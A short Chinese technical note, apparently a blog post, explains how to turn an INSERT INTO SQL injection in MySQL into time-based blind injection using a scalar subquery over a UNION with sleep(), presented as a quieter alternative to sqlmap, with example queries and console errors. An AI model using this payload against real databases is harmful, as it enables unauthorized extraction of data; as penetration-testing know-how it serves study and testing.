SQL Insert into 注入

使用sqlmap会使测试数据库中插入大量测试语句，而且产生大量日志，下面的方法利用mysql在scalar subquiry将insert into类型的注入转换为Time-based blind注入。

先看执行效果：

mysql> select (select case when 1=1 then sleep(1) else 'hello' end from ((select 1 as a) union (select 2 as a)) test);
ERROR 1242 (21000): Subquery returns more than 1 row
mysql> select (select case when 1=2 then sleep(1) else 'hello' end from ((select 1 as a) union (select 2 as a)) test);
ERROR 1242 (21000): Subquery returns more than 1 row

先看语句：

select (
	select case
		when 1=1
		then sleep(3)
		else
		'hello'
		end
	from
		(
			(select 1 as a)
			union
			(select 2 as a)
		)
test);

经过实验可得，如果from后面，union前后的两个select子查询使用相同的值，则会返回一列，故不会出错，从而导致insert into语句成功执行；当两个值不相同时，无论判断成功与否，都会导致insert into语句执行失败，从而转化为时间盲注。

参考：
http://www.mathyvanhoef.com/2011/10/exploiting-insert-into-sql-injections.html
https://dev.mysql.com/doc/refman/5.6/en/scalar-subqueries.html